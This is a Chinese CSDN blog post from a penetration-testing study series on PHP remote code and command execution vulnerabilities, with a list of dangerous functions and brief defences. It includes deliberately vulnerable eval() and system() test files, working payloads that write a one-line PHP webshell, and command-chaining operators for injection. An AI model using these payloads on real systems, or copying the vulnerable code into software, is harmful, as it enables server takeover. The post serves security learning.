第30天:RCE代码和命令执行漏洞

已于 2023-07-02 15:05:04 修改
阅读量229 收藏
点赞数
分类专栏: 渗透测试学习笔记 文章标签: web安全
于 2023-07-02 15:04:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cailme/article/details/131494506
版权

RCE为远程代码/命令执行的漏洞

漏洞产生的原因:

在Web应用中开发者为了灵活性,简洁性等会让应用去调用代码或者系统命令执行函数去处理。同时没有考虑用户是否可以控制这些函数的参数问题(若不能控制这些参数,自然也没有这个漏洞;若能控制这些参数,也可能出现考虑了但没有完全防住或者压根没考虑 ),以至于这个漏洞的产生。

在这里插入图片描述

产生原因

漏洞函数
可控参数

防护方法
  • 敏感函数禁止
    禁止不使用的函数,能禁止就禁止,不行就变量过滤或者固定。
  • 变量过滤或者固定
    固定比起过滤要好,变量实在太多了,容易被绕过。
  • WAF产品

代码执行

PHP代码执行函数:eval()assert()preg_replace()create_function()array_map()call_user_func()call_user_func_array()array_filter()uasort()

 1. 若代码执行函数的输入参数被``反引号包含时,则此时相当于系统执行函数, 如输入值为echo `dir`;
 2. 由反引号括起来的字符串被当做shell命令执行,其标准输出结果取代整个反引号部分。
 3. 反引号不区分操作系统,无论Window还是Linux都有这个现象。

eval()函数

eval() 函数把字符串按照 PHP 代码来计算,一般情况下不建议使用容易被黑客利用。

在windows服务器中创建test.php文件,代码如下

<?php
        $code=$_GET['x'];
        echo $code;
        echo "</br>";
        eval($code);
?>

访问test.php,将phpinfo();传给参数x
在这里插入图片描述

输入echo 'dir';,未用反应号包裹dir,并不会打印文件路径,而是直接输出了dir
在这里插入图片描述

输入echo `dir`,成功打印出文件路径

在这里插入图片描述
写入一句话木马x=$file=fopen("x.php","w") or die("false"); fwrite($file, "<?php @eval(\$_POST['cmd']);?>"); fclose($file);
在这里插入图片描述

写入成功,后续使用工具连接即可
在这里插入图片描述

命令执行

system()函数

system()是一个和操作系统紧密相关的函数,用户可以使用它在自己的程序中调用系统提供的各种命令

在windows服务器中创建test.php文件,代码如下

<?php
      $code=$_GET['x'];
      system($code);
?>

访问test.php,传入参数值x=dir,成功打印文件路径
在这里插入图片描述

写入一句话木马echo ^<?php @eval($_POST['cmd']);?^> > x.php

其中 ^ 的作用是转义 <

在这里插入图片描述

查看123.php文件内容,windows的查看命令是type,linux是cat
在这里插入图片描述

命令执行绕过

参考文章:
https://www.cnblogs.com/sfsec/p/15192819.html
https://www.cnblogs.com/pursue-security/p/15291426.html
https://blog.csdn.net/weixin_46962006/article/details/121828362

常见管道符

windows
  1. " | " 直接执行后面的语句(前面的语句是错是对无关紧要)

在这里插入图片描述
在这里插入图片描述

  1. " || " 如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。

在这里插入图片描述
在这里插入图片描述

  1. " & " 两条命令都执行,前面的语句可真可假

在这里插入图片描述
在这里插入图片描述

  1. " && " 如果前面的语句为假则直接出错,也不执行后面的语句,前面的语句为真则两条命令都执行,前面的语句只能为真

在这里插入图片描述

在这里插入图片描述

Linux

  1. " ; " 执行完前面的语句再执行后面的语句
    在这里插入图片描述

  2. " | " 显示后面语句的执行结果(前面的语句无论对错)
    在这里插入图片描述

在这里插入图片描述

  1. " || " 当前面的语句执行出错时,执行后面的语句

在这里插入图片描述
在这里插入图片描述

  1. " & " 两条命令都执行,前面的语句可真可假

在这里插入图片描述

  1. " && " 前面的语句为真才能执行两条命令,否则都不执行

在这里插入图片描述
在这里插入图片描述

cailme
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
30天WEB漏洞-RCE代码命令执行漏洞全解1
08-03
WEB 漏洞-RCE 代码命令执行漏洞全解在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码命令执行函数去处理。比如当应用在调用一些能将
命令执行RCE各种绕过合集
2301_76690905的博客
11-22 262
对php来说这是fl""ag而不是flag关键字不会匹配上,但是对于linux系统来说cat /fl""ag等效于cat /flag。外面包裹的是单引号里面就是双引号,外面包裹的是双引号里面就是单引号,或者用斜线\去掉功能性,避免报错。被视为一个文件路径,并将该文件的内容输出到标准输出(通常是终端),并在每一行前添加行号。把一段已经拼接好的文件名输出到输出到一个文件里,然后把这个文件当成一个脚本去执行。目录是系统的标准目录之一,它包含了许多系统命令和工具的二进制文件,而。的文件,并给其内容添加行号。
远程命令执行漏洞原理,以及防护绕过方式
Scalzdp的专栏
11-21 939
今天分享了远程执行指令的原理和如何进行远程执行指令漏洞的利用和绕过方法,远程命令执行漏洞危害性特别大,攻击者可以利用远程命令执行漏洞给运营团队带来如下一些危害:继承Web服务程序的权限去执行系统命令或读写文件、反弹shell、控制整个网站甚至服务器、进一步内网渗透。在防御的过程我们可以通过加强对用户输入的验证:比如限制输入内容,其次,采用最小权限原则,将程序运行权限限制在最低限度。
rce总结,绕过手法+危险函数举例
2202_75361164的博客
11-05 786
rce总结,绕过手法+危险函数举例
08-(RCE命令代码执行漏洞
qq_56414082的博客
03-28 824
RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)分为远程命令执行ping和远程代码执行eval。
RCE(远程命令执行)绕过总结
Elite的博客
04-18 3015
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
远程代码/命令执行RCE漏洞
weixin_68681298的博客
07-22 168
less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符。远程命令执行Remote Command Execute相关函数。f***会匹配所有四个字母第一个字母是f的文件,比如。tac:从最后一行倒序显示内容,并将所有内容输出。代替目录分隔符/(本质是使用多个命令组合)cat:由第一行开始显示内容,并将所有内容输出。more:根据窗口大小,一页一页的现实文件内容。nl:类似于cat -n,显示时输出行号。或者%0a(回车符);{IFS}、${IFS}等来代替空格。Linux命令拼接符号。
RCE代码命令执行漏洞简解
weixin_46739058的博客
04-09 2268
Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码命令执行函数去处理。比如当应用在调用一些能将字符串转化成代 码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏 洞。同样调用系统命令处理,将造成命令执行漏洞RCE:远程命令/代码执行(remote command/code execute) 在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符
RCE远程命令执行漏洞挖掘思路
gududeajun的博客
09-01 3275
RCE漏洞存在的地方包括:在url参数上,文件下载处,在查看图片,查看文件等地方在文件删除上,SSRF可能存在的地方,变量参数提交的地方等
fastjson-rce-exploit:利用fastjson远程执行代码漏洞
03-15
fastjson-rce-exploit poc for fastjson远程执行代码漏洞
shiro_rce_tool:shiro rce tool 反序列 命令执行 一键工具 回显
04-29
shiro_rce 下载地址:https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip 2021-03-31: 新增自定义或随机useragent randomagent --> random useragent useragent= --> set useragent cookiename= --&...
浅析JDWP远程命令执行漏洞 [ Mi1k7ea ]1
08-03
2022/3/2 下午8:30浅析JDWP远程命令漏洞 [ Mi1k7ea ]https://www.mi1k7ea.com/2021/08/06/浅析JDW
web安全】——命令执行漏洞RCE)详解
热门推荐
Demo不是emo的博客
09-20 1万+
这个阶段需要沉定来积累经验,靶场,漏洞复现和总结经验才是当前的中心任务,所以我也想好好捋一下其他类型的漏洞,同时也分享出来,今天的内容是命令执行漏洞
RCE(命令执行)总结
leekos的博客,分享web安全相关知识~
01-05 2195
RCE(命令执行)总结
RCE代码命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 4048
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
RCE远程代码命令执行
weixin_54431413的博客
04-01 1808
目录 一、判断操作系统 二、查看页面源代码,有js过滤 三、在请求包中做文章 一、判断操作系统 二、查看页面源代码,有js过滤 三、在请求包中做文章 编辑并重发 得到一个新的response 四、查看key_php得到key ...
RCE远程代码执行漏洞(原理、危害、拼接字符、DVWA、pikachu、防御)
m0_61506558的博客
08-07 1146
什么是远程代码执行
网络安全之动态路由OSPF基础
最新发布
m0_65858385的博客
05-07 965
要让3知道1的存在,所以OSPF要传递的信息要更多,也就是说OSPF传输的距离很远,所以OSPF对资源占用就很多,之所以做OSPF协议,主要RIP有问题,cost只有15,只要网络稍微大了点,超过cost15的值,RIP就用不了,所以OSPF使用的环境是路由器特别多,LSA种类多,LSA传播距离,传播范围很大,对于OSPF的算法,对于设备资源的消耗就很大,因此OSPF发明了一个区域area。ABR:区域边界路由器,如果一个路由器属于area 0 与非area 0的路由器就称为ABR,例如2,4就是ABR。
远程代码执行漏洞RCE原理
03-28
远程代码执行漏洞(Remote Code Execution,RCE)是指攻击者通过利用程序或系统中的漏洞,成功地在远程主机上执行自己编写或者上传的恶意代码。攻击者可以利用这个漏洞执行系统命令、上传或下载文件、获取敏感信息等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值